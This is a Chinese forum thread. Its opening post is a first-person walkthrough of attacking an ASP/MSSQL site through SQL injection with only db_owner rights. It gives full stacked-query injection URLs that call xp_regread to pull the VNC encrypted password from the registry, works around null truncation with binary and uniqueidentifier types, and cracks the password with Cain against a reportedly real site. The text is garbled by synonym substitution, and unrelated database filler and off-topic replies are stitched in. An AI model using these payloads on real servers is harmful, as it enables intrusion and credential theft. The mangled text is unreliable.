仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 979|回复: 8
打印 上一主题 下一主题

[学习教程] MYSQL网页编程之MSSQL db_owner脚色注进间接取得体系权...

[复制链接]
飘灵儿 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 22:34:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
只需每年花费2000到5000美元。无论你是自掏腰包来创建一个新兴公司,还是得到了风险投资商的赞助,使用MySQL都可以降低你所需要的人力成本。 信任人人对ASP+MSSQL注进都已很熟习了,连一个对SQL语法涓滴不懂的人也能够用NBSI来轻松进侵大批网站。但就算是一个SQLINJECTION妙手,假如针对在MSSQL中只要db_owner脚色,破不出猜不到网站背景的情形下,仿佛也无技可施;除用备份失掉shell的这个思绪,我在网上其实没有找出更好的进侵举措。不外,备份失掉的shell只是实际化的东东,假如一个webshell有20mb的话,你还能用它吗?前不久,我就碰着了如许的一个台湾网站,办理员的暗码却是用NBSi跑了出来,但是用户名由于是繁体的缘故原由在NBSi中成了一堆乱码。我也找到了背景,可只要干努目的份。怎样办?我又扫了它的一切端口,发明开了5900,估量是办理员用了VNC对服务器举行了远程把持。这时候,我就有一个思绪,能不克不及把VNC在注册表的加密暗码读出来再来破解呢?看我扮演吧!
  TELNET服务器的5900端口,失掉讯息如所示,证明服务器切实其实用的是VNC。信任人人城市用读xp_regread来读注册表了,顺次提交以下语句:
  http://www.something.com/script.asp?id=2;createtable[dbo].[cyfd]([gyfd][char](255));
如许我们就乐成地建了一个名为cyfd的表,而且增加了范例是char,长度为255的字段名gyfd。然后向表中加数据:
_blank>http://www.something.com/script.asp?id=2;DECLARE@resultvarchar(255)EXECmaster.dbo.xp_regreadHKEY_CURRENT_USER,SoftwareORLWinVNC3,Password,@resultoutputinsertintocyfd(gyfd)values(@result);--
从注册表中读出VNC在注册表的加密暗码的值,再把值拔出到刚建的表中。然后暴出VNC在注册表的加密暗码:
_blank>http://www.something.com/script.asp?id=2and1=(selectcount(*)fromcyfdwheregyfd>1)。
  但是了局年夜掉我所看,gyfd的值是空的。假如如许简单的话,不会有这篇文章呈现了。这是甚么缘故原由呢?我的语法不准确?翻来覆往的反省我的语句也没有发明毛病呀。岂非繁体的vnc在注册内外的地位纷歧样?厥后我又入手下手在本机装了vnc又在剖析查循器里做测试,失掉的了局倒是个数字5。这时候czy上线了,扣问了一下,他劝我把gyfd的这个字段改成二进制数据范例binary来试一下。因而我又在本机测试了一下,顺次提交以下语句:
   http://127.0.0.1/script.asp?id=2;createtable[dbo].[cyfd]([gyfd][binary](20));
http://127.0.0.1/script.asp?id=2;DECLARE@resultbinary(20)EXECmaster.dbo.xp_regreadHKEY_CURRENT_USER,SoftwareORLWinVNC3,Password,@resultoutputinsertintocyfd(gyfd)values(@result);--
然后我再用nbsi跑出cyfd内外gyfd这个字段的值。了局到是出来了,失掉了vnc的加密暗码值是0x0E3515AC00000000000000000000000000000000。可这儿还不合错误,我在本机装的vnc在注册内外的暗码值是hex:0e,35,15,ac,00,62,d3,08这个呀。本来binary(n)的数据存储长度是流动的,当输出的二进制长度小于n时,余下长度填0增补。我在注进语句中写进的binary(20)是充足写进vnc加密暗码的长度时,为何另有那末多0来添补呢?这是由于恰好我的vnc暗码是0e3515ac0062d308,在碰着了00的情形下,xp_regread觉得已读完了它的值呢,把00当做了却束符,以是只读到了0x0E3515AC,我晕!
  翻了一下书,终究让我找到了一个特别的数据范例uniqueidentifier,是用来存储一个16字节长的二进制数据范例。把注进语句改革一下:
   http://127.0.0.1/script.asp?id=2;createtable[dbo].[cyfd]([gyfd][uniqueidentifier]);
   http://127.0.0.1/script.asp?id=2;DECLARE@resultuniqueidentifierEXECmaster.dbo.xp_regreadHKEY_CURRENT_USER,SoftwareORLWinVNC3,Password,@resultoutputinsertintocyfd(gyfd)values(@result);--
然后再用nbsi跑一下,跑出来了,不外失掉的了局是AC15350E-6200-08D3-0000-000000000000。
  AC15350E-6200-08D3-0000-000000000000和我在注册内外的准确的vnc暗码的值0e3515ac0062d308比拟,能看出来有甚么分歧吗?只不外按次是倒置的,信任人人城市小学的算术,这个不必我教了。试一下用cain破出vnc的暗码,看看行不可  看模样在本机做的测试统统乐成。这办法用到台湾上的站点尝尝,哎,仍然没有跑出vnc的暗码,大概繁体vnc在注册表的地位分歧吧。不外,我研讨了一上午,有了一点劳绩,就放过你吧。
这是无法比较的,因为基于云的数据库提供了不同的模式。关键是要通过围绕云计算产品来包装其他增值服务以适应不断变化的市场条件:这就是DBaaS。
飘灵儿 该用户已被删除
沙发
 楼主| 发表于 2015-1-19 16:54:41 | 只看该作者
对于数据库来说,查询是数据库的灵魂,那么SQL查询效率究竟效率如何呢?下文将带对SQL查询的相关问题进行讨论,供您参考。
因胸联盟 该用户已被删除
板凳
发表于 2015-1-28 05:11:19 | 只看该作者
sqlserver的痛苦之处在于有用文档的匮乏,很多只是表明的东西
精灵巫婆 该用户已被删除
地板
发表于 2015-2-5 13:31:22 | 只看该作者
如果,某一版本可以提供强大的并发响应,但是没有Oracle的相应版本稳定,或者价格较贵,那么,它就是不适合的。
第二个灵魂 该用户已被删除
5#
发表于 2015-2-11 21:20:18 | 只看该作者
财务软件要用SQL也只是后台的数据库而已,软件都是成品的,当然多学东西肯定是有好处的..
金色的骷髅 该用户已被删除
6#
发表于 2015-3-2 19:44:28 | 只看该作者
其中最有名的应该是row_number了。这个终于解决了用临时表生成序列号的历史,而且SQLServer2005的row_number比Oracle的更先进。因为它把Orderby集成到了一起,不用像Oracle那样还要用子查询进行封装。
深爱那片海 该用户已被删除
7#
发表于 2015-3-11 05:56:54 | 只看该作者
而写到本地,我又考虑到效率问题.大家来讨论讨论吧,分数不打紧,就给10分,十全十美,没啥对错,各抒己见,但是要有说服力的哦~
乐观 该用户已被删除
8#
发表于 2015-3-17 22:08:11 | 只看该作者
再开发调试阶段和OLAP环境中,外键是可以建立的。新版本中加入了SETNULL和SETDEFAULT属性,能够提供能好的级联设置。
柔情似水 该用户已被删除
9#
发表于 2015-3-25 03:45:37 | 只看该作者
where子句的作用是在对查询结果进行分组前,将不符合where条件的行去掉,即在分组之前过滤数据,条件中不能包含聚组函数,使用where条件显示特定的行。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-22 20:31

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表